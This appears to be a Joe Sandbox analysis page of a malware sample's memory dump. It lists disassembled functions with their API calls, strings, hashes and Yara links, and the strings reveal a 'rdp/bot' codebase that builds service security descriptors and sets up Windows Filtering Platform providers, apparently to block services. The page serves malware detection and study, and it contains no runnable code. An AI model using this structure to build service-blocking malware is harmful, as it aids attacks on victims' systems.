[I] (%s) -> Done(svc_name=%s), xrefs: 00007FF66EBA91F9

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: Heap$Free$BuildCriticalLibraryProcessSection$AddressAllocCopyDescriptorEnterFileLeaveLoadLocalProcSecurityTrusteeWithfflushfwritestrcmpstrlen
String ID: RtlAnsiStringToUnicodeString$RtlCopyMemory$RtlCreateServiceSid$RtlFreeUnicodeString$RtlZeroMemory$[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> RtlAnsiStringToUnicodeString failed(res=%08lx)$[E] (%s) -> RtlCreateServiceSid failed(res=%08lx)$[I] (%s) -> Done(svc_name=%s)$block_svc$mem_alloc$ntdll.dll$svc
API String ID: 3039259412-1782951725
Opcode ID: aecca9bf93d322d8573f51c3096c9132d3b81b29e48e314583a7dc795d1e92dc
Instruction ID: 7d2fa9d088b613819606332b056dd61cc82bee1c1f0fe1d8bca542db7cfe49af
Opcode Fuzzy Hash: aecca9bf93d322d8573f51c3096c9132d3b81b29e48e314583a7dc795d1e92dc
Instruction Fuzzy Hash: ECD15F21A4C783C6FF708B09F6843B96271EBAA344F504035EA4D8EA95DE7EE544D709

Function 00007FF66EBA433B Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fopen.MSVCRT ref: 00007FF66EBA4363
_errno.MSVCRT ref: 00007FF66EBA444F
_errno.MSVCRT ref: 00007FF66EBA4470
fwrite.MSVCRT ref: 00007FF66EBA44E4

Strings

[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu), xrefs: 00007FF66EBA45C4
[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d), xrefs: 00007FF66EBA4464
fs_file_write, xrefs: 00007FF66EBA43C5, 00007FF66EBA43FB, 00007FF66EBA442B, 00007FF66EBA445D, 00007FF66EBA450D, 00007FF66EBA45BD
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA4402, 00007FF66EBA4432
[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d), xrefs: 00007FF66EBA4514
[E] (%s) -> Failed(path=%s,mode=%s,err=%08x), xrefs: 00007FF66EBA43CC
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF66EBA43ED, 00007FF66EBA441D
NULL, xrefs: 00007FF66EBA459A, 00007FF66EBA45A6
(path != NULL), xrefs: 00007FF66EBA43F4
(mode != NULL), xrefs: 00007FF66EBA4424

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: _errno$fopenfwrite
String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
API String ID: 1336347884-544371937
Opcode ID: a998415da828f98903b86042555ffa528a7441b3811dfce188ff0d53f32f1298
Instruction ID: 3b9b4e7336268c178b7b90bdb7f7df85e300e37e8a788f12a69400397fb65f8c
Opcode Fuzzy Hash: a998415da828f98903b86042555ffa528a7441b3811dfce188ff0d53f32f1298
Instruction Fuzzy Hash: AD517061E48643C3FE119B59DB842B823B1EF6A794F594136F90DCF2A1EE7CE5068308

Function 00007FF66EBA168C Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF66EBA16AC
GetLastError.KERNEL32 ref: 00007FF66EBA17E0

Part of subcall function 00007FF66EBA19C0: GetModuleHandleExA.KERNEL32 ref: 00007FF66EBA19DE

strlen.MSVCRT ref: 00007FF66EBA16FE
strlen.MSVCRT ref: 00007FF66EBA171A
strcat.MSVCRT ref: 00007FF66EBA1735
strlen.MSVCRT ref: 00007FF66EBA173D
strlen.MSVCRT ref: 00007FF66EBA1752
fopen.MSVCRT ref: 00007FF66EBA1778

Strings

[E] (%s) -> Failed(err=%08x), xrefs: 00007FF66EBA17CA
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FF66EBA17F2
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FF66EBA18B7
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FF66EBA17A5
Done, xrefs: 00007FF66EBA191D
[I] (%s) -> %s, xrefs: 00007FF66EBA192B
debug_init, xrefs: 00007FF66EBA179E, 00007FF66EBA17C3, 00007FF66EBA17EB, 00007FF66EBA18B0, 00007FF66EBA1924
wfpblk.l, xrefs: 00007FF66EBA175A
log, xrefs: 00007FF66EBA1767

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$wfpblk.l
API String ID: 3395718042-2291025694
Opcode ID: 49a17f5a92830ced3a36e3677e3db33b320a408802c6024068c7c2da36c633a4
Instruction ID: efa4157b14607bd28b4500f869eaab06d9845808eeb7efff067fbf91d310e102
Opcode Fuzzy Hash: 49a17f5a92830ced3a36e3677e3db33b320a408802c6024068c7c2da36c633a4
Instruction Fuzzy Hash: 5E5153D0E4C603D2FAA15B48A6C03B81275EF2F744F985132E60ECE296DE2CA949C349

Function 00007FF66EBA5E6F Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 199
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32 ref: 00007FF66EBA5EC7
LockFileEx.KERNEL32 ref: 00007FF66EBA5F00
GetLastError.KERNEL32 ref: 00007FF66EBA5FD5
GetLastError.KERNEL32 ref: 00007FF66EBA60BA
CloseHandle.KERNEL32 ref: 00007FF66EBA622E

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA5F8F, 00007FF66EBA5FBF
[E] (%s) -> CreateFileA failed(path=%s,gle=%lu), xrefs: 00007FF66EBA5FEA
(lock != NULL), xrefs: 00007FF66EBA5FB1
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF66EBA5F7A, 00007FF66EBA5FAA
fs_file_lock, xrefs: 00007FF66EBA5F54, 00007FF66EBA5F88, 00007FF66EBA5FB8, 00007FF66EBA5FE3, 00007FF66EBA60C8, 00007FF66EBA624B
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA5F5B
NULL, xrefs: 00007FF66EBA6239
(path != NULL), xrefs: 00007FF66EBA5F81
[E] (%s) -> LockFileEx failed(path=%s,gle=%lu), xrefs: 00007FF66EBA60CF
[I] (%s) -> Done(path=%s,lock=%p), xrefs: 00007FF66EBA6252

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleLock
String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock
API String ID: 2747014929-530486279
Opcode ID: 28a03d3f68afc9b5ab97c55a7cf804f003cfde781369e6ff187817ba87fd1780
Instruction ID: 07faf046ac863ed245fa7aba0effe052faf818041356a584c2f0c4aed760ab00
Opcode Fuzzy Hash: 28a03d3f68afc9b5ab97c55a7cf804f003cfde781369e6ff187817ba87fd1780
Instruction Fuzzy Hash: A9813050D9D70AC3FE30974CA6803783170EF2A754F540132FA6E8E6D5EE6EAA85834D

Function 00007FF66EBA9181 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.MSVCRT ref: 00007FF66EBA8EEF
GetProcessHeap.KERNEL32 ref: 00007FF66EBA8F6B
HeapAlloc.KERNEL32 ref: 00007FF66EBA8F7C
BuildTrusteeWithSidW.ADVAPI32 ref: 00007FF66EBA9010
BuildSecurityDescriptorW.ADVAPI32 ref: 00007FF66EBA905D
GetProcessHeap.KERNEL32 ref: 00007FF66EBA90F2
HeapFree.KERNEL32 ref: 00007FF66EBA9103

Strings

[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu), xrefs: 00007FF66EBA9077
block_svc, xrefs: 00007FF66EBA9070

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
API String ID: 493744553-3317923414
Opcode ID: 052a71c4555acffeaaa4906deb5c7fc5526f27be3c9c1e84582a7bf668648cdc
Instruction ID: 81698650db992fd4dc30e0cd30ad1289dd2c2f90f4f85af46ae1e88c2c5003e4
Opcode Fuzzy Hash: 052a71c4555acffeaaa4906deb5c7fc5526f27be3c9c1e84582a7bf668648cdc
Instruction Fuzzy Hash: 4F517131608BC2C6EB708B15E5843AAB370FB99744F404135EA8D8BB98EF3DD549CB45

Function 00007FF66EBA9195 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.MSVCRT ref: 00007FF66EBA8EEF
GetProcessHeap.KERNEL32 ref: 00007FF66EBA8F6B
HeapAlloc.KERNEL32 ref: 00007FF66EBA8F7C
BuildTrusteeWithSidW.ADVAPI32 ref: 00007FF66EBA9010
BuildSecurityDescriptorW.ADVAPI32 ref: 00007FF66EBA905D
GetProcessHeap.KERNEL32 ref: 00007FF66EBA90F2
HeapFree.KERNEL32 ref: 00007FF66EBA9103

Strings

[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu), xrefs: 00007FF66EBA9077
block_svc, xrefs: 00007FF66EBA9070

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
API String ID: 493744553-3317923414
Opcode ID: b5c7524d6233bc13863bba0be5668a15fec480e53ddebb1f9498f54106728d50
Instruction ID: 6d1df855c0bf9d1be5ea2a88da2ec6a98bd2f000192d10ebaea6c9f17c6dd828
Opcode Fuzzy Hash: b5c7524d6233bc13863bba0be5668a15fec480e53ddebb1f9498f54106728d50
Instruction Fuzzy Hash: 5F517131608BC2C6EB708B15E5843AAB370FB99744F404135EA8D8BB98EF3DD549CB45

Function 00007FF66EBA918B Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.MSVCRT ref: 00007FF66EBA8EEF
GetProcessHeap.KERNEL32 ref: 00007FF66EBA8F6B
HeapAlloc.KERNEL32 ref: 00007FF66EBA8F7C
BuildTrusteeWithSidW.ADVAPI32 ref: 00007FF66EBA9010
BuildSecurityDescriptorW.ADVAPI32 ref: 00007FF66EBA905D
GetProcessHeap.KERNEL32 ref: 00007FF66EBA90F2
HeapFree.KERNEL32 ref: 00007FF66EBA9103

Strings

[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu), xrefs: 00007FF66EBA9077
block_svc, xrefs: 00007FF66EBA9070

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
API String ID: 493744553-3317923414
Opcode ID: e137156efd894a51f6124f7f1d871e399153414ab707446600318c66e0ccb24c
Instruction ID: 53a1f5ea9a865a25f7f397bd7e64029bea258d07fef3c4253dd37efdae0bab3b
Opcode Fuzzy Hash: e137156efd894a51f6124f7f1d871e399153414ab707446600318c66e0ccb24c
Instruction Fuzzy Hash: C0517131608BC2C6EB708B15E5843AAB370FB99744F404135EA8D8BB98EF3DD549CB45

Function 00007FF66EBA9D40 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.MSVCRT ref: 00007FF66EBA9E2C

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA9D90, 00007FF66EBA9DC3, 00007FF66EBA9DF6
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FF66EBA9E5D
(sec != NULL), xrefs: 00007FF66EBA9D82
NULL, xrefs: 00007FF66EBA9EBE, 00007FF66EBA9EC7
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF66EBA9D7B, 00007FF66EBA9DAE, 00007FF66EBA9DE1
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FF66EBA9EA5
(name != NULL), xrefs: 00007FF66EBA9DB5
ini_get_var, xrefs: 00007FF66EBA9D89, 00007FF66EBA9DBC, 00007FF66EBA9DEF, 00007FF66EBA9E56, 00007FF66EBA9E9E
(var != NULL), xrefs: 00007FF66EBA9DE8

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
API String ID: 1004003707-3780280517
Opcode ID: 315ba949fec665040c86c14cfdba382cd6e3a68f55e458fd157ca27c3dfdd6b5
Instruction ID: 749d37eb3bbfb7398e49f6cf10412e436935e8aa67ba96907ecc32df19877cf7
Opcode Fuzzy Hash: 315ba949fec665040c86c14cfdba382cd6e3a68f55e458fd157ca27c3dfdd6b5
Instruction Fuzzy Hash: D8413961E49647E2FA608B48FA807F46271FB2A344F488136FA4DCE591DF3DA649D30D

Function 00007FF66EBA9BB9 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.MSVCRT ref: 00007FF66EBA9CAD

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA9C09, 00007FF66EBA9C3C, 00007FF66EBA9C6F
(ini != NULL), xrefs: 00007FF66EBA9BFB
(sec != NULL), xrefs: 00007FF66EBA9C61
[D] (%s) -> Done(name=%s), xrefs: 00007FF66EBA9CCD
NULL, xrefs: 00007FF66EBA9D24
ini_get_sec, xrefs: 00007FF66EBA9C02, 00007FF66EBA9C35, 00007FF66EBA9C68, 00007FF66EBA9CC6, 00007FF66EBA9D04
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FF66EBA9D0B
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF66EBA9BF4, 00007FF66EBA9C27, 00007FF66EBA9C5A
(name != NULL), xrefs: 00007FF66EBA9C2E

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-386092548
Opcode ID: 60811ac15eee7ed5292fcef168163863ff9bb8dc15cbc46863516350c7bd327a
Instruction ID: d30430b345860a353db33fbedbdf42bce565382d1ef859895128a0ef5cc87849
Opcode Fuzzy Hash: 60811ac15eee7ed5292fcef168163863ff9bb8dc15cbc46863516350c7bd327a
Instruction Fuzzy Hash: D8417FA1E49947D2FE508B08FA807B42271FB2A348F584036F90DCE5D1EE7DA645D30D

Function 00007FF66EBAA0F0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_errno.MSVCRT ref: 00007FF66EBAA18A
_errno.MSVCRT ref: 00007FF66EBAA1A8
_errno.MSVCRT ref: 00007FF66EBAA1B4

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBAA170
ini_get_uint32, xrefs: 00007FF66EBAA169, 00007FF66EBAA1D4
(value != NULL), xrefs: 00007FF66EBAA162
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF66EBAA15B
[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FF66EBAA1DB

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: _errno
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
API String ID: 2918714741-1670302297
Opcode ID: 7bf6c9a41745675a725e6b14e4249c4cc625627d809daff04cad01ae91eba1b9
Instruction ID: 2b5982ccd6589a5410dc05e8d8c0249d75c74beb8765df1683a2193536a1de38
Opcode Fuzzy Hash: 7bf6c9a41745675a725e6b14e4249c4cc625627d809daff04cad01ae91eba1b9
Instruction Fuzzy Hash: F8216061A08646D6E6619F19EAC07AA3374FB6A784F444036FE4C8B654DF3CD949CB08

Function 00007FF66EBA14E2 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fwrite.MSVCRT ref: 00007FF66EBA158E
fflush.MSVCRT ref: 00007FF66EBA159A
EnterCriticalSection.KERNEL32 ref: 00007FF66EBA15B3
LeaveCriticalSection.KERNEL32 ref: 00007FF66EBA15DB
CopyFileA.KERNEL32 ref: 00007FF66EBA1638

Strings

., xrefs: 00007FF66EBA161D
1, xrefs: 00007FF66EBA1622

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1
API String ID: 513531256-1839485796
Opcode ID: 2960b9ecaab591c16170f553e21163bf5ef34305d8ef571820ba495a7a1ad153
Instruction ID: 35ec4919a2ccf5c0369b89e672fd00b3ab90860e9799bd8f9e7f46f6d73580cd
Opcode Fuzzy Hash: 2960b9ecaab591c16170f553e21163bf5ef34305d8ef571820ba495a7a1ad153
Instruction Fuzzy Hash: 79416261E48642C6F7209B15EA943BA6274FBAE780F840035EA4DCB795DF3CE585C748

Function 00007FF66EBA76D0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FwpmProviderDestroyEnumHandle0.FWPUCLNT ref: 00007FF66EBA7822
wcscmp.MSVCRT ref: 00007FF66EBA786D

Strings

[E] (%s) -> FwpmProviderCreateEnumHandle0 failed(res=%08lx), xrefs: 00007FF66EBA77D7
setup_filt_prov, xrefs: 00007FF66EBA77D0, 00007FF66EBA77ED, 00007FF66EBA793D
[E] (%s) -> FwpmProviderEnum0 failed(res=%08lx), xrefs: 00007FF66EBA77F4
[E] (%s) -> FwpmProviderAdd0 failed(res=%08lx), xrefs: 00007FF66EBA7944

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
